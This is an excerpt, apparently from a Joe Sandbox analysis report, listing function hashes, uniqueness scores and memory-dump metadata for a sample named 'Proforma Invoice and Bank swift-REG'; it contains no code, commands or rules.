Opcode Fuzzy Hash: 6300b41d3f3b0626345cc6d1e5d575823d5cac8fd0468418f8be4339fa5b3b11
Instruction Fuzzy Hash: 92214571141641DFC722EF68CA11F5ABBF9BF18704F1445A9A0098B6B2DB34E941CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00B1B390, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a69d12083cebf0e04539047b841e8bdc0f0fb4e42e919f4cad9c56697410c57b
Instruction ID: 655b15bdde47b4d7ee936e259045d8389b051856ae92fbfb0b42668351568252
Opcode Fuzzy Hash: a69d12083cebf0e04539047b841e8bdc0f0fb4e42e919f4cad9c56697410c57b
Instruction Fuzzy Hash: E911AB333011109BCB189A159D81A6BB3D6EBC9331B7402FAED26D7380DE31AC06C2C8

Uniqueness

Uniqueness Score: -1.00%

Function 00B74257, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d86baf7409c049e6af7b4b8f478fb3415749f2f5c583feb998cf983d616aec1
Instruction ID: 6470835eefc3955f1a62b3bc1f367b549a4a5d732e6037639047257abd1215a5
Opcode Fuzzy Hash: 1d86baf7409c049e6af7b4b8f478fb3415749f2f5c583feb998cf983d616aec1
Instruction Fuzzy Hash: 11215B70612602CFC726EF64D550A14B7F1FB45316B24C2ABE12D8B2A2EF319895DF41

Uniqueness

Uniqueness Score: -1.00%

Function 00B12397, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a64ec6a5a7bd62516d95c96047e7850b614d5630965a7b8391946aee4e2ff17
Instruction ID: 16c2380c63d263eaa8ce045a8a9ecf900f8a655dfb6a7b115fe96d76d5d0335a
Opcode Fuzzy Hash: 5a64ec6a5a7bd62516d95c96047e7850b614d5630965a7b8391946aee4e2ff17
Instruction Fuzzy Hash: A71126327007016BD3309729BC91F65B7D9EB50721F6444FBFA06E7292DEB4E8918758

Uniqueness

Uniqueness Score: -1.00%

Function 00B646A7, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 339310b9cdce713780e242031846987820307212e64ab587e6123e9903f43ca8
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: E511E572904608BBC7059F5CD9818BEBBF9EF95300F1080AAF944C7351DB359D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00AEC962, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8c4fc1586728abd9626d51946413ecad8d7f014d7a414d4643f37ccdad4cad
Instruction ID: 3fc6fdba1c3e3e728d873538cee85089472d46e2f28ca022bca0c470608ed6b6
Opcode Fuzzy Hash: 2d8c4fc1586728abd9626d51946413ecad8d7f014d7a414d4643f37ccdad4cad
Instruction Fuzzy Hash: D211CE323486469BC710AF28EC96A6AB7F5FB88711B5005BAFD45936A1EF20EC14C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00B237F5, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3304b45c25206c603aefcac5e6cf94b8a5b8a1764f986a3fd93a3a61e12e9ac
Instruction ID: e6642cdcc69cd282d120fce00fdea5b190cfaac619beec36089efe0fa10edd5e
Opcode Fuzzy Hash: e3304b45c25206c603aefcac5e6cf94b8a5b8a1764f986a3fd93a3a61e12e9ac
Instruction Fuzzy Hash: E50104729416209BC3278B19A940A26BBE6DF85F5071540EAF90D8F311DB38CE00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00B1002D, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 07c9025a53fdffeeff4aba47ab7caf00e585cce51a81faa1e1057567688bc030
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: D01122726166808FD722AB28C988B757BE5EF45759F1900F0ED048B692EB68DCC5C260

Uniqueness

Uniqueness Score: -1.00%

Function 00AF766D, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 028dc149dfeea17549d68cb63317a69143308e79c3cbe941f631cc0ff10b32b4
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 0801847270451DABC760DE9EDD41EBF77ADEB84760B240574BA18CB290DA30DD01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AE9080, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9420942912ccb30b0614b9018b3ad01239f1ead11b45f9f338017504708faec7
Instruction ID: 449b6320f50816259172a98e787505aaba7f8d4466a4a954de00df728fb9ea37
Opcode Fuzzy Hash: 9420942912ccb30b0614b9018b3ad01239f1ead11b45f9f338017504708faec7
Instruction Fuzzy Hash: AC01AF726027449FC7299F19E840B22BBF9EF85325F254077E6068B7A1D774DC81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B7C450, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 2c74a7454c1ee3288c9c3a98704625d084b6cbeb4443d89926765a92929f780f
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: BE019272280615BFD721AF65CC91E62FBADFF54790F108569F118426A1CB21ACA0CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4015, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b65e699235779cda7fb97bfbd479cab5584669392de28ca6abbda8ce7960f0
Instruction ID: 18c6ae6797a2241fcd8e35a4cf9cc3c15f55aba72564e32886eadd5245c31fdb
Opcode Fuzzy Hash: f1b65e699235779cda7fb97bfbd479cab5584669392de28ca6abbda8ce7960f0
Instruction Fuzzy Hash: 21018F726419457FC211ABA9CE85E63FBECFF45760B000265B60883A53DB24EC11C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 00BA138A, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a40ae71031eed580badc4fc8a4ea67779a63b6f111eb6d50efa6629bdeaa465
Instruction ID: d587208de7ba73976b3165bbeb4266ce88c627fed086dc97f62379f1d7ec5856
Opcode Fuzzy Hash: 1a40ae71031eed580badc4fc8a4ea67779a63b6f111eb6d50efa6629bdeaa465
Instruction Fuzzy Hash: E4015271A05218AFCB14DFA9D842EAEBBF8EF45710F0040A6F904EB281DA749A01C795

Uniqueness

Uniqueness Score: -1.00%

Function 00BA14FB, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2abf14f2c3ca9ffadd92c2ea99ed321d00fc590874ca22e36c0a31e11f92b674
Instruction ID: 6685efc4b3ad129ffc0c1bc104d01cdda0ff860267206275169bc410661c98c6
Opcode Fuzzy Hash: 2abf14f2c3ca9ffadd92c2ea99ed321d00fc590874ca22e36c0a31e11f92b674
Instruction Fuzzy Hash: EB019671E01258AFCB14DF68D842EAEB7F8EF45710F0040A6F904EB281DA70DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00AE58EC, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6ba42b93426a668ccd2a8cbf23e6a8e4ac895c26804642ed02e5bf1e3d9cf9
Instruction ID: b1c6a2583b4962b5e62943f56abbcb0a18f5c12bd764c87d24d95a2bb9a51cba
Opcode Fuzzy Hash: 9d6ba42b93426a668ccd2a8cbf23e6a8e4ac895c26804642ed02e5bf1e3d9cf9
Instruction Fuzzy Hash: 44018F31E04948DBC714EF3AEC11AAEB7F8EB44374F5900AAAA0597352EE20ED018694

Uniqueness

Uniqueness Score: -1.00%

Function 00AFB02A, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 41b865546660c75941aa5450ae357c263dd3f0e3115e8cf6159ac60ec2596287
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 05015A722549849FD322C79CC988F7677E8EB45750F0A00A1BA19CBA91DB38DD40D621

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1074, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2f4214167c26c630054fbfa198b2f77588767e92d61e58d9efdcc7bbf92b0a
Instruction ID: 7aca73ad60093d90cf2d81e47a91270de70e72f18c508abe08735a9b78d93e06
Opcode Fuzzy Hash: bf2f4214167c26c630054fbfa198b2f77588767e92d61e58d9efdcc7bbf92b0a
Instruction Fuzzy Hash: 05014C725047419FC711EF2CC841F6AB7D5EB84310F44CABAF88583291EE71D880CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B9FEC0, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2221947aae11243b485af1283f0c609876e4ab9ce7114d693644c57eb8c09a1e
Instruction ID: 1194f6a97fb163fc9168d4cf19cd9b8ae5e6fbb396f22d186cd7778c9d94ac89
Opcode Fuzzy Hash: 2221947aae11243b485af1283f0c609876e4ab9ce7114d693644c57eb8c09a1e
Instruction Fuzzy Hash: 35017571A01219ABCB14DBA9D846FAEB7F8EF45710F0040B6B904DB291DA709901C795

Uniqueness

Uniqueness Score: -1.00%

Function 00B9FE3F, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7d0ed19a4801c98a12babb8e1e9fdff0b01168b2aefb94bd26fecee30f847ab
Instruction ID: 801202f60240f207f81d277d711ca829fa7094a94eef4081fd8ab7efdb387364
Opcode Fuzzy Hash: b7d0ed19a4801c98a12babb8e1e9fdff0b01168b2aefb94bd26fecee30f847ab
Instruction Fuzzy Hash: 50017171A01219ABCB14DFA9D846EAEBBF8EF45710F0040B6B904EB292DA709941C795

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8A62, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea78c66805b6f62cf045aa4c512aa1629a6b9af4a2f73f1b57e40402abde85e3
Instruction ID: 51f5ae29fcc238d3599c753f02b57b50ebb6a1f7a5f658a4b5891ecb592bad1b
Opcode Fuzzy Hash: ea78c66805b6f62cf045aa4c512aa1629a6b9af4a2f73f1b57e40402abde85e3
Instruction Fuzzy Hash: DD012171A0121C9FCB04DFA9D9419EEBBF8EF49710F10409AF904E7351DA74A901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8ED6, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33fc176c168374d2d5f13fa620ea228e07536e285122d2e739f6d000da8ed74d
Instruction ID: e3d0ffeb206ecdc60b3f9dd5df32b1886daa9fec2c4cca449592a474e8301ff7
Opcode Fuzzy Hash: 33fc176c168374d2d5f13fa620ea228e07536e285122d2e739f6d000da8ed74d
Instruction Fuzzy Hash: 641100709002199FD704DFA8D441AADF7F4FF08300F1442A6E518EB382EA349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AEDB60, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 9ca30648eadba5be5f0d43b9a8e8f59e18752b9b477a3691dc094a01455ec5c8
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: A1F096336456A29BD7326B578981F6BB6A59FC1B60F270035F1059B345DE608C0296E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AEB1E1, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: e741451ee5be3979cab5f73f3542343ce13d67b65d382ea87de84d250182f048
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: EF01F9322945C09BD722975EC808F5ABBD8EF41754F0800F1FA148B6B2EB78DD10D325

Uniqueness

Uniqueness Score: -1.00%

Function 00B7FE87, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b046b09ea2c0c2f00227155147ee888d51f4b91a4215a382ce2cfd2e2413b10f
Instruction ID: f03290177a955e499f98463b85e41e88df7f4a98103e5ba27b3b5d5d4a3fed43
Opcode Fuzzy Hash: b046b09ea2c0c2f00227155147ee888d51f4b91a4215a382ce2cfd2e2413b10f
Instruction Fuzzy Hash: 1C016270A00209AFCB14DFA8D542A6EB7F4EF04300F1041A9B958DB392DA35E901CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00BA131B, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5786d19b6426d647c12b3cf7319d0d092c38d7085a1ab39669a2e8993b3ac80f
Instruction ID: 2434af8703b5276c2c80f8fdd7740c5970a5493579193a6601f9f8c07434a17e
Opcode Fuzzy Hash: 5786d19b6426d647c12b3cf7319d0d092c38d7085a1ab39669a2e8993b3ac80f
Instruction Fuzzy Hash: A8013171A05218AFCB44DFA9D546AAEB7F4FF09700F1040A9F955EB391EA349A00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8F6A, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f45543fbb8844e7686db6336c60a00a9b0fe2bca9d789c4536448661392d9f
Instruction ID: b159389dab28a530625479df102c7992576c7457960acc5f1df5966903f8d6c2
Opcode Fuzzy Hash: e0f45543fbb8844e7686db6336c60a00a9b0fe2bca9d789c4536448661392d9f
Instruction Fuzzy Hash: 98014474A0120CAFCB04DFA8D546AAEB7F4EF18300F1044A9F945EB391EE74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1608, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a91b919af916094912d94c6fcafcda4a7c9673c7b4b0228320123977f8f50d0
Instruction ID: 5bbf230096bfb0fbf4906e8ea08b7f94e3bfca253deb039d6994fc10c394f44d
Opcode Fuzzy Hash: 2a91b919af916094912d94c6fcafcda4a7c9673c7b4b0228320123977f8f50d0
Instruction Fuzzy Hash: 09F06271E05258EFCB14DFA8D546E6EB7F4EF05300F0440A9F915EB391EA349900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B0C577, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6935a5395521787c64824e03e7517f4312b4ec5729a0d00a38653cf1701e32
Instruction ID: e290caca979b0af836130667a60de56ee6c4491aabf5200e65743d67337ade1f
Opcode Fuzzy Hash: 9a6935a5395521787c64824e03e7517f4312b4ec5729a0d00a38653cf1701e32
Instruction Fuzzy Hash: BDF090BA9156949FD73187188886B227FD8DB25770F5546EAE405871C2D7A4FC80C350

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2073, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b62dee5b52700b68123eadb96bac38743fe1c17cb6b19706968a48aad0c448
Instruction ID: 2d69d6b32d9506c755a2d45330ea3eded0c14ed9740ee8edbd4a4c52e45ba84f
Opcode Fuzzy Hash: b2b62dee5b52700b68123eadb96bac38743fe1c17cb6b19706968a48aad0c448
Instruction Fuzzy Hash: 6DF0A02A52A1854ADF326B2C69227E1BBD4DB57321F2904E7E8909B202DD358C83CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B2927A, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: ec9689f315f3f52cfec7405c4d77a5b5ddc83220e3dfc2271674648c1b0ae7b8
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 2CE02B323405006BD7119E45DC81F1337EDDF82720F0140B8B5081E283C6F6DC0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8D34, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f33daad6aee7347c86ca6d8b4d299a14b375e3fe72c16c8f5949fb8496f607
Instruction ID: 7946d5184a226fac135614fe94d6efae388917b4bf66c94b384b043f5bf02873
Opcode Fuzzy Hash: b4f33daad6aee7347c86ca6d8b4d299a14b375e3fe72c16c8f5949fb8496f607
Instruction Fuzzy Hash: A7F03070A446189FD714EFA8D546AAEB7F8EF14700F5080AAF915AB291EE74D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8B58, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ef281c8ed83108302199f7c5c8dde7df96ea12e27a91b4b23cf1daa6db91d36
Instruction ID: 06af208df7dc94481380edf47d711d4b50cbe4e074a738418c307d233280b1b8
Opcode Fuzzy Hash: 0ef281c8ed83108302199f7c5c8dde7df96ea12e27a91b4b23cf1daa6db91d36
Instruction Fuzzy Hash: 8BF082B0A44258ABDB14EBB8E906E7EB7F8EF04300F1404A9B905DB3D1EE74D900C798

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8CD6, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaafc72db21eb90bedb93c52fbc466364f9628c0137ef9742f988fc212a49f02
Instruction ID: 625d2336f9c9ab6e3e02448cf61a963f770b7ea5eb29a5b72cf3e83711f68829
Opcode Fuzzy Hash: aaafc72db21eb90bedb93c52fbc466364f9628c0137ef9742f988fc212a49f02
Instruction Fuzzy Hash: 50F089709056189FCB04DBA8E956DAEB7F8EF05300F1001EAF915EB2D1EE34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 00B0746D, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ff230282cadc3518753e470bc37b3ec9d23f332fa1ec77ca146850473aaedd
Instruction ID: b5a9f055bf37c7eee51c7641e89ec6ecc7a974ce6081c28872e5bcdef21cd8ae
Opcode Fuzzy Hash: b8ff230282cadc3518753e470bc37b3ec9d23f332fa1ec77ca146850473aaedd
Instruction Fuzzy Hash: D4F0BE34E88245AACF019B68C880B7DFFE1EF14350F1482E5E851AB2E1EF24EC00E785

Uniqueness

Uniqueness Score: -1.00%

Function 00AE4F2E, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e40df6d67ac5dd9a17f517b91da0d0f6852edc4e2ac7a470312fa8d2dd89bd16
Instruction ID: ce64a94e79f4db7df4e761e753f0ce8a3467a156b541bb3f91e98c2433a4efcb
Opcode Fuzzy Hash: e40df6d67ac5dd9a17f517b91da0d0f6852edc4e2ac7a470312fa8d2dd89bd16
Instruction Fuzzy Hash: 85F0E2325396848FDB70F718C544B22B7E8EB18B78F4584E4D50587921C774EE80D648

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A44B, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb904c2f1f7cca6234307e6ad3115b395ff13988f72577c204d24ba9d26fcae
Instruction ID: d33c299a79126d1c35af00266255dfb9866674892e04e5f792f83e43ef0b9a03
